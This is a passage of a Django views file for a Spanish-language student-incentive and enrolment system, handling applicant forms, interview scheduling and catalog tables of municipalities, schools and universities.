context_instance=RequestContext(request))\n\n #return render_to_response('estimulos_form.html',{'documento' :documento}, context_instance=RequestContext(request))\n else:\n return render_to_response('estimulos_form.html',{'municipio':municipio, 'universidad':universidad, 'vereda':vereda, 'colegio':colegio, 'sedes':sedes, 'centrosSena':centrosSena,'documento':documento}, context_instance = RequestContext(request))\n return render_to_response('informe.html',context_instance = 
RequestContext(request))\n\ndef horaEntrevista(request):\n documento = request.POST['docum']\n if request.method == 'POST':\n hora = Horas.objects.all()\n fecha = request.POST['diaMes']\n estudiante = FormularioEstimulos.objects.filter(documento = documento)\n cita = Fechas.objects.filter(fecha = fecha)\n agendados = Fechas.objects.all()\n listAgendados = []\n for age in agendados:\n listAgendados.append(age.nombre_id)\n if ( estudiante[0].id in listAgendados ):\n nombreAgendado = estudiante[0].nombre\n return render_to_response('formulario_exitoso.html',{'nombreAgendado':nombreAgendado}, context_instance = RequestContext(request))\n if ('hora' in request.POST):\n fechas = Fechas()\n fechas.hora_id = request.POST['hora']\n fechas.fecha = request.POST['diaMes']\n fechas.nombre_id = estudiante[0].id\n fechas.save()\n fechaGuarda = Fechas.objects.filter(nombre = estudiante[0].id)\n nombreGuardado = fechaGuarda[0].nombre.nombre\n diaGuardado = fechaGuarda[0].fecha\n horaGuardada = fechaGuarda[0].hora.hora\n\n return render_to_response('formulario_exitoso.html',{'nombreGuardado':nombreGuardado, 'diaGuardado':diaGuardado, 'horaGuardada':horaGuardada, 'documen':documento },context_instance = RequestContext(request))\n\n@csrf_exempt\ndef fechaEntrevista(request):\n documento = request.POST['doc']\n if request.method == 'POST':\n hora = Horas.objects.all()\n fecha = request.POST['dia']\n if fecha != '2018-02-18':\n cita = Fechas.objects.filter(fecha = fecha)\n horasOcupadas = []\n horasOcupadasDisp = []\n for h in range(len(hora)):\n cadaHora = hora[h].id\n for c in range(len(cita)):\n if (cadaHora==cita[c].hora_id):\n horasOcupadas.append(cadaHora)\n for elemento in horasOcupadas:\n if horasOcupadas.count(elemento) > 2:\n horasOcupadasDisp.append(elemento)\n lista_nueva = []\n for i in hora:\n x = i.id\n if (x not in horasOcupadasDisp):\n lista_nueva.append(i)\n print (horasOcupadas)\n print(\"--------------------------\")\n print (horasOcupadasDisp)\n return render_to_response('formulario_exitoso.html',{ \"lista_nueva\": lista_nueva, \"documento\":documento, 'fecha':fecha }, context_instance = RequestContext(request))\n return render_to_response('formulario_exitoso.html',{\"documento\": documento}, context_instance = RequestContext(request))\n return render_to_response('formulario_exitoso.html', context_instance = RequestContext(request))\n\n@csrf_exempt\ndef editaFechaEntrevista(request):\n documento = request.POST['doc']\n pk = request.POST['agendado']\n hora = Horas.objects.all()\n fecha = request.POST['dia']\n if fecha != '2018-02-18':\n cita = Fechas.objects.filter(fecha = fecha)\n horasOcupadas = []\n horasOcupadasDisp = []\n for h in range(len(hora)):\n cadaHora = hora[h].id\n for c in range(len(cita)):\n if (cadaHora==cita[c].hora_id):\n horasOcupadas.append(cadaHora)\n for elemento in horasOcupadas:\n if horasOcupadas.count(elemento) > 2:\n horasOcupadasDisp.append(elemento)\n lista_nueva = []\n for i in hora:\n x = i.id\n if (x not in horasOcupadasDisp):\n lista_nueva.append(i)\n print (horasOcupadas)\n print(\"--------------------------\")\n print (horasOcupadasDisp)\n return render_to_response('editaAgenda.html',{ \"lista_nueva\": lista_nueva,\"pk\":pk, \"documento\":documento, 'fecha':fecha }, context_instance = RequestContext(request))\n return render_to_response('editaAgenda.html',{\"documento\": documento}, context_instance = RequestContext(request))\n\n@login_required(login_url = \"/login\")\ndef estimulos(request):\n sisben = Sisben.objects.all()\n estrato = 
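# Hedged sketch: fechaEntrevista above marks an hour as full once it appears in
# more than two bookings (three interview slots per hour), using list.count
# inside a loop. collections.Counter does the same tally in one linear pass:
from collections import Counter

booked_hour_ids = [3, 3, 3, 5, 5, 7]      # hora ids already taken that day
full = {h for h, n in Counter(booked_hour_ids).items() if n > 2}
all_hour_ids = [3, 5, 7, 9]
print([h for h in all_hour_ids if h not in full])   # [5, 7, 9]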
Estrato.objects.all()\n municipio = Municipios.objects.all().order_by()\n universidad = Universidades.objects.all()\n vereda = Veredas.objects.all()\n colegio = Colegios.objects.all()\n sedes = Sedes.objects.all()\n centrosSena = CentrosSena.objects.all()\n video = get_object_or_404(Video, pk=1)\n codigo = 1000\n if request.method == 'POST':\n documento = request.POST['4Documento']\n aspirante = FormularioEstimulos.objects.filter(documento = documento)\n if (len(aspirante)>=1):\n return render_to_response('formulario_exitoso.html',{'documento' :documento}, context_instance=RequestContext(request))\n else:\n formularioEstimulos = FormularioEstimulos()\n formularioEstimulos.nombre = request.POST['1Nombres']\n formularioEstimulos.apellido = request.POST['2Apellidos']\n formularioEstimulos.tipoDocumento = request.POST['3Tipo_documento']\n formularioEstimulos.documentoOtro = request.POST['documentoOtro']\n formularioEstimulos.documento = request.POST['4Documento']\n formularioEstimulos.email = request.POST['5Email']\n formularioEstimulos.celular = request.POST['6Celular']\n formularioEstimulos.genero = request.POST['7Genero']\n formularioEstimulos.edad = request.POST['8Edad']\n formularioEstimulos.estadoCivil = request.POST['9Estado_civil']\n formularioEstimulos.cabezaFamilia = request.POST['10Cabeza_familia']\n formularioEstimulos.hijos = request.POST['hijos']\n formularioEstimulos.pertenencia = request.POST['11pertenencia']\n formularioEstimulos.pertenenciaOtro = request.POST['pertenenciaOtro']\n formularioEstimulos.direccionEstudiante = request.POST['12DireEstudiante']\n formularioEstimulos.ciudadEstudiante = request.POST['Ciudad_estudiante']\n formularioEstimulos.barrioEstudiante = request.POST['Barrio_vereda_estudiante']\n formularioEstimulos.ubicacionEstudiante = request.POST['Ubicacion_residencia_estudiante']\n formularioEstimulos.vivienda = request.POST['13Vivienda']\n formularioEstimulos.estrato = request.POST['14Estrato']\n formularioEstimulos.sisben = request.POST['15SISBEN']\n formularioEstimulos.nucleoFamiliar = request.POST['16Nucleo_familiar']\n formularioEstimulos.direccionPadres = request.POST['17DirePadres']\n formularioEstimulos.ciudadPadres = request.POST['Ciudad_padres']\n formularioEstimulos.barrioPadres = request.POST['Barrio_vereda_padres']\n formularioEstimulos.ubicacionPadres = request.POST['Ubicacion_padres']\n formularioEstimulos.serviciosPublicos = request.POST.getlist('18servicios_publicos[]')\n formularioEstimulos.dependenciaEconomica = request.POST['19dependencia_economica']\n formularioEstimulos.dependenciaOtro = request.POST['dependenciaOtro']\n formularioEstimulos.ingresosFamilia = request.POST['20Ingresos_familia']\n formularioEstimulos.colegio = request.POST['21colegio']\n formularioEstimulos.oficialPrivado = request.POST['22Oficial_privado']\n formularioEstimulos.anoTerminacion = request.POST['23ano_terminacion']\n formularioEstimulos.actaGrado = request.POST['actaGrado']\n formularioEstimulos.universidad = request.POST['24Universidad']\n formularioEstimulos.centrosSena = request.POST['centrosSena']\n\n formularioEstimulos.sede = request.POST['25Sede']\n formularioEstimulos.acreditacionUniversidad = request.POST['26AcreditaUniversidad']\n formularioEstimulos.carrera = request.POST['27Carrera']\n formularioEstimulos.tecnicaTecnologica = request.POST['tecnicaTecnologica']\n formularioEstimulos.acreditacionCarrera = request.POST['28AcreditaCarrera']\n formularioEstimulos.cicloEducacion = request.POST['29ciclo_educacion']\n formularioEstimulos.semestreEnCurso = 
request.POST['semestreEnCurso']\n formularioEstimulos.modalidad = request.POST['30Modalidad']\n formularioEstimulos.modalidadOtro = request.POST['modalidadOtro']\n formularioEstimulos.propedeutico = request.POST['31propedeuticos']\n formularioEstimulos.propedeuticoOtro = request.POST['propedeuticoOtro']\n formularioEstimulos.valorMatricula = request.POST['32Valor_matricula']\n formularioEstimulos.beneficiarioprogramas = request.POST['33beneficiario_programas']\n formularioEstimulos.programaOtro = request.POST['programaOtro']\n formularioEstimulos.incentivoEducativo = request.POST['34incentivo_educativo']\n formularioEstimulos.cuantasVeces = request.POST['cuantasVeces']\n formularioEstimulos.extraAcademicas = request.POST['35extra-academicas']\n formularioEstimulos.extraAcademicaPaga = request.POST['36extra_academicas_pagan']\n formularioEstimulos.parentesco1 = request.POST.getlist('parentesco1')\n formularioEstimulos.parentesco2 = request.POST.getlist('parentesco2')\n formularioEstimulos.parentesco3 = request.POST.getlist('parentesco3')\n formularioEstimulos.parentesco4 = request.POST.getlist('parentesco4')\n formularioEstimulos.parentesco5 = request.POST.getlist('parentesco5')\n formularioEstimulos.parentesco6 = request.POST.getlist('parentesco6')\n formularioEstimulos.parentesco7 = request.POST.getlist('parentesco7')\n formularioEstimulos.totalObtenido = 0\n formularioEstimulos.save()\n documento = request.POST['4Documento']\n nombre = request.POST['1Nombres']\n return render_to_response('formulario_exitoso.html',{'codigo':codigo, 'documento':documento, 'nombre':nombre}, context_instance = RequestContext(request))\n return render_to_response('plataformacerrada.html',{'municipio':municipio, 'universidad':universidad, 'vereda':vereda, 'colegio':colegio, 'sedes':sedes, 'centrosSena':centrosSena, 'video':video}, context_instance = RequestContext(request))\n\n@login_required(login_url = \"/login\")\ndef docentes(request):\n\n if request.method == 'POST':\n validators = Validator(request.POST)\n validators.required = ['nombre','apellido','documento','email']\n if validators.is_valid():\n docentes = docente()\n docentes.nombres = request.POST['nombre']\n docentes.apellidos = request.POST['apellido']\n docentes.documento = request.POST['documento']\n docentes.email = request.POST['email']\n docentes.asignatura = request.POST['asignatura']\n docentes.contacto = request.POST['contacto']\n docentes.save()\n print(docentes.nombres)\n else:\n return render_to_response('docentes.html', {'error': validators.getMessage() } , context_instance = RequestContext(request))\n return render_to_response('docentes.html',context_instance = RequestContext(request))\n\n@login_required(login_url = \"/login\")\ndef matriculas(request):\n grad = Grado.objects.all()\n grupo = Grupos2.objects.all()\n estrato = Estrato.objects.all()\n instituciones = Inst_educativas2.objects.all()\n sedes = SedeInstitucion2.objects.all()\n veredas = Veredas.objects.all()\n\n if request.method == 'POST':\n #validators = Validator(request.POST)\n #validators.required = ['nombre','apellido','Documento','7Genero','7Genero','15SISBEN','14Estrato','trasporte','12DireEstudiante','familias','alimentacion','desplazado','contacto','dia','email','credo']\n #if validators.is_valid():\n alumno = Alumno2()\n alumno.procedencia_id = request.POST['procedencia']\n alumno.institucion_id = request.POST['institucion']\n alumno.sede_id = request.POST['sede']\n alumno.nombres = request.POST['nombre']\n alumno.apellidos = request.POST['apellido']\n 
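`docentes` (and the commented-out block in `matriculas`) validate required POST keys through a custom `Validator` helper and then copy each field by hand. Django's built-in `forms` module covers the same required-field check; a hedged sketch with field names taken from `validators.required`, not the project's actual form class:

```python
from django import forms

class DocenteForm(forms.Form):
    # Fields are required by default, mirroring validators.required above.
    nombre = forms.CharField()
    apellido = forms.CharField()
    documento = forms.CharField()
    email = forms.EmailField()
    asignatura = forms.CharField(required=False)
    contacto = forms.CharField(required=False)

# Inside a view:
#     form = DocenteForm(request.POST)
#     if form.is_valid():
#         datos = form.cleaned_data   # validated, cleaned values
#     else:
#         errores = form.errors       # per-field error messages
```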
alumno.documento = request.POST['Documento']\n alumno.grado_id = request.POST['grado']\n alumno.genero= request.POST['7Genero']\n alumno.sisben = request.POST['15SISBEN']\n alumno.estrato_id = request.POST['14Estrato']\n alumno.transporte = request.POST['trasporte']\n alumno.direccion = request.POST['12DireEstudiante']\n alumno.familias = request.POST['familias']\n alumno.alimentacion = request.POST['alimentacion']\n alumno.desplazado = request.POST['desplazado']\n alumno.contacto = request.POST['6Celular']\n alumno.nacimiento = request.POST['dia']\n alumno.email = request.POST['email']\n alumno.credo = request.POST['credo']\n alumno.save()\n print(alumno.nombres)\n return render_to_response('matriculas.html', {'gradoss':grad,'estrato':estrato, 'instituciones':instituciones, 'sedes':sedes, 'grupo':grupo, 'veredas':veredas } ,context_instance = RequestContext(request))\n\n@login_required(login_url = \"/login\")\ndef actualiza_alumnos(request):\n pk = request.POST['pk']\n alumno = get_object_or_404(Alumno, pk=pk)\n if request.method == 'POST':\n validators = Validator(request.POST)\n validators.required = ['nombre','apellido','documento','grado','genero','sisben','estrato','trasporte','direccion','familias','alimentacion','desplazado','contacto','nacimiento','email','credo']\n if validators.is_valid():\n alumno.nombres = request.POST['nombre']\n alumno.apellidos = request.POST['apellido']\n alumno.documento = request.POST['documento']\n alumno.grado_id = request.POST['grado']\n alumno.genero= request.POST['genero']\n alumno.sisben = request.POST['sisben']\n alumno.estrato_id = request.POST['estrato']\n alumno.transporte = request.POST['trasporte']\n alumno.direccion = request.POST['direccion']\n alumno.familias = request.POST['familias']\n alumno.alimentacion = request.POST['alimentacion']\n alumno.desplazado = request.POST['desplazado']\n alumno.contacto = request.POST['contacto']\n alumno.nacimiento = request.POST['nacimiento']\n alumno.email = request.POST['email']\n alumno.credo = request.POST['credo']\n alumno.save()\n return render_to_response('busquedas_alumnos.html',context_instance=RequestContext(request))\n\n@login_required(login_url = \"/login\")\ndef portada(request):\n if 'matricula' in request.GET.keys():\n return render_to_response('index.html',context_instance = RequestContext(request))\n if 'usuario' in request.GET.keys():\n return render_to_response('formulario.html',context_instance = RequestContext(request))\n if 'doce' in request.GET.keys():\n return render_to_response('docentes.html',context_instance = RequestContext(request))\n return render_to_response('portada.html',context_instance = RequestContext(request))\n\n@login_required(login_url = \"/login\")\ndef busquedas(request):\n return render_to_response('busquedas.html',context_instance = RequestContext(request))\n\n@login_required(login_url = \"/login\")\ndef esti_form(request):\n return render_to_response('inicio.html',context_instance = RequestContext(request))\n\n@login_required(login_url = \"/login\")\n#@salidaPdf\ndef busqueda_docente(request):\n docent = None\n buscar = None\n if 'captar' in request.GET.keys():\n buscar = request.GET['dato']\n #qset = 
(Q(documento__icontains=buscar) )\n qset = ( Q( documento__icontains = buscar) |\n Q( nombres__icontains = buscar) |\n Q( apellidos__icontains = buscar)\n )\n docent = docente.objects.filter(qset).first()\n print(buscar)\n return render_to_response('busqueda_docente.html', {'docente': docent, 'filtro': buscar},context_instance=RequestContext(request))\n\n@login_required(login_url = \"/login\")\ndef busquedas_alumnos(request):\n if request.method == 'POST':\n identificacion = request.POST['busqueda']\n aspirante = FormularioEstimulos.objects.filter(documento = identificacion)\n if (len(aspirante)>=1):\n return render_to_response('resultadobusqueda.html',{'aspirante':aspirante}, context_instance=RequestContext(request))\n alumno = Alumno2.objects.filter(documento = identificacion)\n if (len(alumno)>=1):\n return render_to_response('resultadobusqueda.html',{'alumno':alumno}, context_instance=RequestContext(request))\n else:\n return render_to_response('noresultados.html',context_instance=RequestContext(request))\n\n@login_required(login_url = \"/login\")\ndef editarBusqueda(request, pk):\n municipio = Municipios.objects.all().order_by()\n universidad = Universidades.objects.all()\n vereda = Veredas.objects.all()\n colegio = Colegios.objects.all()\n sedes = Sedes.objects.all()\n centrosSena = CentrosSena.objects.all()\n aspiranteEstimulo = FormularioEstimulos.objects.get(id = pk )\n if request.method == 'POST':\n formulario = get_object_or_404(FormularioEstimulos, pk=pk)\n formulario.nombre = request.POST['1Nombres']\n formulario.apellido = request.POST['2Apellidos']\n formulario.tipoDocumento = request.POST['3Tipo_documento']\n formulario.documentoOtro = request.POST['documentoOtro']\n formulario.documento = request.POST['4Documento']\n formulario.email = request.POST['5Email']\n formulario.celular = request.POST['6Celular']\n formulario.genero = request.POST['7Genero']\n formulario.edad = request.POST['8Edad']\n formulario.estadoCivil = request.POST['9Estado_civil']\n formulario.cabezaFamilia = request.POST['10Cabeza_familia']\n formulario.hijos = request.POST['hijos']\n formulario.pertenencia = request.POST['11pertenencia']\n formulario.pertenenciaOtro = request.POST['pertenenciaOtro']\n formulario.direccionEstudiante = request.POST['12DireEstudiante']\n formulario.ciudadEstudiante = request.POST['Ciudad_estudiante']\n formulario.barrioEstudiante = request.POST['Barrio_vereda_estudiante']\n formulario.ubicacionEstudiante = request.POST['Ubicacion_residencia_estudiante']\n formulario.vivienda = request.POST['13Vivienda']\n formulario.estrato = request.POST['14Estrato']\n formulario.sisben = request.POST['15SISBEN']\n formulario.nucleoFamiliar = request.POST['16Nucleo_familiar']\n formulario.direccionPadres = request.POST['17DirePadres']\n formulario.ciudadPadres = request.POST['Ciudad_padres']\n formulario.barrioPadres = request.POST['Barrio_vereda_padres']\n formulario.ubicacionPadres = request.POST['Ubicacion_padres']\n formulario.dependenciaEconomica = request.POST['19dependencia_economica']\n formulario.dependenciaOtro = request.POST['dependenciaOtro']\n formulario.ingresosFamilia = request.POST['20Ingresos_familia']\n formulario.colegio = request.POST['21colegio']\n formulario.oficialPrivado = request.POST['22Oficial_privado']\n formulario.anoTerminacion = request.POST['23ano_terminacion']\n formulario.actaGrado = request.POST['actaGrado']\n formulario.universidad = request.POST['24Universidad']\n formulario.centrosSena = request.POST['centrosSena']\n\n formulario.sede = 
request.POST['25Sede']\n formulario.acreditacionUniversidad = request.POST['26AcreditaUniversidad']\n formulario.carrera = request.POST['27Carrera']\n formulario.tecnicaTecnologica = request.POST['tecnicaTecnologica']\n formulario.acreditacionCarrera = request.POST['28AcreditaCarrera']\n formulario.cicloEducacion = request.POST['29ciclo_educacion']\n formulario.semestreEnCurso = request.POST['semestreEnCurso']\n formulario.modalidad = request.POST['30Modalidad']\n formulario.modalidadOtro = request.POST['modalidadOtro']\n formulario.propedeutico = request.POST['31propedeuticos']\n formulario.propedeuticoOtro = request.POST['propedeuticoOtro']\n formulario.valorMatricula = request.POST['32Valor_matricula']\n formulario.beneficiarioprogramas = request.POST['33beneficiario_programas']\n formulario.programaOtro = request.POST['programaOtro']\n formulario.incentivoEducativo = request.POST['34incentivo_educativo']\n formulario.cuantasVeces = request.POST['cuantasVeces']\n formulario.extraAcademicas = request.POST['35extra-academicas']\n formulario.extraAcademicaPaga = request.POST['36extra_academicas_pagan']\n formulario.parentesco1 = request.POST.getlist('parentesco1')\n formulario.parentesco2 = request.POST.getlist('parentesco2')\n formulario.parentesco3 = request.POST.getlist('parentesco3')\n formulario.parentesco4 = request.POST.getlist('parentesco4')\n formulario.parentesco5 = request.POST.getlist('parentesco5')\n formulario.parentesco6 = request.POST.getlist('parentesco6')\n formulario.parentesco7 = request.POST.getlist('parentesco7')\n formulario.totalObtenido = request.POST.getlist('puntajeObtenido')\n formulario.save()\n documento = request.POST['4Documento']\n trazabilidad(request, documento)\n nombre = request.POST['1Nombres']\n nombreAgendado = request.POST['1Nombres']\n documento = documento\n return render_to_response('formulario_exitoso.html',{'nombreAgendado' :nombreAgendado, 'documen':documento}, context_instance=RequestContext(request))\n\n return render_to_response('editarFormulario.html',{'aspiranteEstimulo':aspiranteEstimulo, 'municipio':municipio, 'universidad':universidad, 'vereda':vereda, 'colegio':colegio, 'sedes':sedes, 'centrosSena':centrosSena }, context_instance=RequestContext(request))\n\n@login_required(login_url = \"/login\")\ndef busquedasIncentivos(request):\n estrato = Estrato.objects.filter()\n grado = Grado.objects.filter()\n if request.method == 'POST':\n buscar=None\n alum=None\n buscar=request.POST['busqueda']\n #qset = (Q(documento__icontains=buscar) )\n qset = ( Q( documento = buscar) |\n Q( nombres = buscar) |\n Q( apellidos = buscar)\n )\n alum = Alumno.objects.filter(qset).first()\n print (alum)\n return render_to_response('formulario_exitoso.html',context_instance=RequestContext(request))\n\n@login_required(login_url = \"/login\")\ndef editaBusqAgenda(request):\n horas = Horas.objects.all()\n if request.method == 'POST':\n pk = request.POST['agendado']\n documento = request.POST['documento']\n if request.POST.get('hora'):\n fecha = get_object_or_404(Fechas, pk=pk)\n fecha.fecha = request.POST['diaMes']\n fecha.hora_id = request.POST['hora']\n fecha.nombre_id = request.POST['documento']\n fecha.save()\n nombreGuardado = fecha.nombre.nombre\n diaGuardado = fecha.fecha\n horaGuardada = fecha.hora.hora\n documen = fecha.nombre.documento\n return render_to_response('agendaExitosa.html',{'documen':documen, 'nombreGuardado':nombreGuardado, 'diaGuardado':diaGuardado, 'horaGuardada':horaGuardada}, context_instance = RequestContext(request))\n return 
render_to_response('editaAgenda.html',{'horas':horas, 'pk':pk, 'documento':documento}, context_instance = RequestContext(request))\n return render_to_response('editaAgenda.html', context_instance = RequestContext(request))\n\n@login_required(login_url = \"/login\")\ndef configuracion(request):\n cita = Fechas.objects.all()\n if request.method == 'POST':\n if 'actualiza' in request._post.keys():\n docentes = docente.objects.get(id=request.user.id)\n docentes.nombres = request.POST['nombre']\n docentes.apellidos = request.POST['apellido']\n docentes.documento = request.POST['documento']\n docentes.email = request.POST['email']\n docentes.asignatura = request.POST['asignatura']\n docentes.contacto = request.POST['contacto']\n docentes.save()\n return render_to_response('actualiza_docentes.html',{'docente':docentes},context_instance = RequestContext(request))\n return render_to_response('configuracionEstimulos.html',{'cita':cita}, context_instance = RequestContext(request))\n\n@login_required(login_url = \"/login\")\ndef logout(request):\n auth.logout(request)\n return HttpResponseRedirect(\"/login\")\n\nfrom django.db.models import Q\nfrom django.core.paginator import Paginator, EmptyPage, PageNotAnInteger\nfrom django.http import Http404\n\n@login_required(login_url = \"/login\")\ndef municipios(request):\n municipios = Municipios.objects.all()\n if request.method == 'POST':\n municipio = Municipios()\n municipio.municipio = request.POST['municipio']\n municipio.save()\n return render_to_response('municipios.html',{'municipios':municipios}, context_instance = RequestContext(request))\n return render_to_response('municipios.html',{'municipios':municipios}, context_instance = RequestContext(request))\n\n@login_required(login_url = \"/login\")\ndef editarMunicipio(request, pk):\n municipio = get_object_or_404(Municipios, pk=pk)\n if request.method == 'POST':\n municipio = get_object_or_404(Municipios, pk=pk)\n municipio.municipio = request.POST['municipio']\n municipio.save()\n municipios = Municipios.objects.all()\n return render_to_response('municipios.html',{'municipios':municipios}, context_instance = RequestContext(request))\n return render_to_response('editarMunicipio.html',{'municipio':municipio}, context_instance = RequestContext(request))\n\n@permission_required('Municipios.can_delete_Municipios', login_url = '/login')\ndef eliminarMunicipio(request, pk):\n municipio = get_object_or_404(Municipios, pk=pk)\n if request.method == 'POST':\n municipio.delete()\n municipios = Municipios.objects.all()\n return render_to_response('municipios.html',{'municipios':municipios}, context_instance = RequestContext(request))\n return render_to_response('eliminarMunicipio.html',{'municipio':municipio}, context_instance = RequestContext(request))\n\n@login_required(login_url = \"/login\")\ndef veredas(request):\n veredas = Veredas.objects.all()\n if request.method == 'POST':\n vereda = Veredas()\n vereda.vereda = request.POST['vereda']\n vereda.save()\n return render_to_response('veredas.html',{'veredas':veredas}, context_instance = RequestContext(request))\n return render_to_response('veredas.html',{'veredas':veredas}, context_instance = RequestContext(request))\n\n@login_required(login_url = \"/login\")\ndef editarVereda(request, pk):\n vereda = get_object_or_404(Veredas, pk=pk)\n if request.method == 'POST':\n vereda = get_object_or_404(Veredas, pk=pk)\n vereda.vereda = request.POST['vereda']\n vereda.save()\n veredas = Veredas.objects.all()\n return 
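From `municipios` onward the module repeats one list-and-create view per catalog table (municipios, veredas, universidades, colegios, centrosSena, sedes), differing only in model, field, template and context key. A hypothetical factory showing how that repetition could collapse, reusing the module's existing `login_required`, `render_to_response` and `RequestContext` imports:

```python
def make_catalog_view(model, field, plural, template):
    """Build a list+create view for a single-field catalog model."""
    @login_required(login_url="/login")
    def view(request):
        if request.method == 'POST':
            row = model()
            setattr(row, field, request.POST[field])
            row.save()
        return render_to_response(template, {plural: model.objects.all()},
                                  context_instance=RequestContext(request))
    return view

# e.g. municipios = make_catalog_view(Municipios, 'municipio', 'municipios', 'municipios.html')
```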
render_to_response('veredas.html',{'veredas':veredas}, context_instance = RequestContext(request))\n return render_to_response('editarVereda.html',{'vereda':vereda}, context_instance = RequestContext(request))\n\n@permission_required('Veredas.can_delete_Veredas', login_url = '/login')\ndef eliminarVereda(request, pk):\n vereda = get_object_or_404(Veredas, pk=pk)\n if request.method == 'POST':\n vereda.delete()\n veredas = Veredas.objects.all()\n return render_to_response('veredas.html',{'veredas':veredas}, context_instance = RequestContext(request))\n return render_to_response('eliminarVereda.html',{'vereda':vereda}, context_instance = RequestContext(request))\n\n@login_required(login_url = \"/login\")\ndef universidades(request):\n universidades = Universidades.objects.all()\n if request.method == 'POST':\n universidades = Universidades()\n universidades.universidad = request.POST['universidad']\n universidades.save()\n return render_to_response('universidades.html',{'universidades':universidades}, context_instance = RequestContext(request))\n return render_to_response('universidades.html',{'universidades':universidades},context_instance = RequestContext(request))\n\n@login_required(login_url = \"/login\")\ndef editarUniversidad(request, pk):\n universidad = get_object_or_404(Universidades, pk=pk)\n if request.method == 'POST':\n universidad = get_object_or_404(Universidades, pk=pk)\n universidad.universidad = request.POST['universidad']\n universidad.save()\n universidades = Universidades.objects.all()\n return render_to_response('universidades.html',{'universidades':universidades}, context_instance = RequestContext(request))\n return render_to_response('editarUniversidad.html',{'universidad':universidad}, context_instance = RequestContext(request))\n\n@permission_required('Universidades.can_delete_Universidades', login_url = '/login')\ndef eliminarUniversidad(request, pk):\n universidad = get_object_or_404(Universidades, pk=pk)\n if request.method == 'POST':\n universidad.delete()\n universidades = Universidades.objects.all()\n return render_to_response('universidades.html',{'universidades':universidades}, context_instance = RequestContext(request))\n return render_to_response('eliminarUniversidad.html',{'universidad':universidad}, context_instance = RequestContext(request))\n\n@login_required(login_url = \"/login\")\ndef colegios(request):\n colegios = Colegios.objects.all()\n if request.method == 'POST':\n colegio = Colegios()\n colegio.colegio = request.POST['colegio']\n colegio.save()\n return render_to_response('colegios.html',{'colegios':colegios}, context_instance = RequestContext(request))\n return render_to_response('colegios.html',{'colegios':colegios}, context_instance = RequestContext(request))\n\n@login_required(login_url = \"/login\")\ndef editarColegio(request, pk):\n colegio = get_object_or_404(Colegios, pk=pk)\n if request.method == 'POST':\n colegio = get_object_or_404(Colegios, pk=pk)\n colegio.colegio = request.POST['colegio']\n colegio.save()\n colegios = Colegios.objects.all()\n return render_to_response('colegios.html',{'colegios':colegios}, context_instance = RequestContext(request))\n return render_to_response('editarColegio.html',{'colegio':colegio}, context_instance = RequestContext(request))\n\n@permission_required('Colegios.can_delete_Colegios', login_url = '/login')\ndef eliminarColegio(request, pk):\n colegio = get_object_or_404(Colegios, pk=pk)\n if request.method == 'POST':\n colegio.delete()\n colegios = Colegios.objects.all()\n return 
render_to_response('colegios.html',{'colegios':colegios}, context_instance = RequestContext(request))\n return render_to_response('eliminarColegio.html',{'colegio':colegio}, context_instance = RequestContext(request))\n\n@login_required(login_url = \"/login\")\ndef centrosSena(request):\n centrosSena = CentrosSena.objects.all()\n if request.method == 'POST':\n centroSena = CentrosSena()\n centroSena.centroSena = request.POST['centroSena']\n centroSena.save()\n return render_to_response('centrosSena.html',{'centrosSena':centrosSena}, context_instance = RequestContext(request))\n return render_to_response('centrosSena.html',{'centrosSena':centrosSena}, context_instance = RequestContext(request))\n\n@login_required(login_url = \"/login\")\ndef editarCentrosSena(request, pk):\n centroSena = get_object_or_404(CentrosSena, pk=pk)\n if request.method == 'POST':\n centroSena = get_object_or_404(CentrosSena, pk=pk)\n centroSena.centroSena = request.POST['centroSena']\n centroSena.save()\n centrosSena = CentrosSena.objects.all()\n return render_to_response('centrosSena.html',{'centrosSena':centrosSena}, context_instance = RequestContext(request))\n return render_to_response('editarCentroSena.html',{'centroSena':centroSena}, context_instance = RequestContext(request))\n\n@permission_required('CentrosSena.can_delete_CentrosSena', login_url = '/login')\ndef eliminarCentrosSena(request, pk):\n centroSena = get_object_or_404(CentrosSena, pk=pk)\n if request.method == 'POST':\n centroSena.delete()\n centrosSena = CentrosSena.objects.all()\n return render_to_response('centrosSena.html',{'centrosSena':centrosSena}, context_instance = RequestContext(request))\n return render_to_response('eliminarCentroSena.html',{'centroSena':centroSena}, context_instance = RequestContext(request))\n\n@login_required(login_url = \"/login\")\ndef sedes(request):\n sedes = Sedes.objects.all()\n if request.method == 'POST':\n sede = Sedes()\n sede.sede = request.POST['sedes']\n sede.save()\n return render_to_response('sedes.html',{'sedes':sedes}, context_instance = RequestContext(request))\n return render_to_response('sedes.html',{'sedes':sedes}, context_instance = RequestContext(request))\n\n@login_required(login_url = \"/login\")\ndef editarSedeUni(request, pk):\n sede = get_object_or_404(Sedes, pk=pk)\n if request.method == 'POST':\n sede = get_object_or_404(Sedes, pk=pk)\n sede.sede = request.POST['sede']\n sede.save()\n sedes = Sedes.objects.all()\n return render_to_response('sedes.html',{'sedes':sedes}, context_instance = RequestContext(request))\n return render_to_response('editarSedeUniversidad.html',{'sede':sede}, context_instance = RequestContext(request))\n\n@permission_required('Sedes.can_delete_Sedes', login_url = '/login')\ndef eliminarSedeUni(request, pk):\n sede = get_object_or_404(Sedes, pk=pk)\n if request.method == 'POST':\n sede.delete()\n sedes = Sedes.objects.all()\n return render_to_response('sedes.html',{'sedes':sedes}, context_instance = RequestContext(request))\n return render_to_response('eliminarSedeUniversidad.html',{'sede':sede}, context_instance = RequestContext(request))\n\n@login_required(login_url = \"/login\")\ndef video(request):\n video = get_object_or_404(Video, pk=1)\n if request.method == 'POST':\n video = get_object_or_404(Video, pk=1)\n video.video = request.POST['video']\n video.save()\n return render_to_response('video.html',{'video':video}, context_instance = RequestContext(request))\n return render_to_response('video.html',{'video':video}, context_instance = 
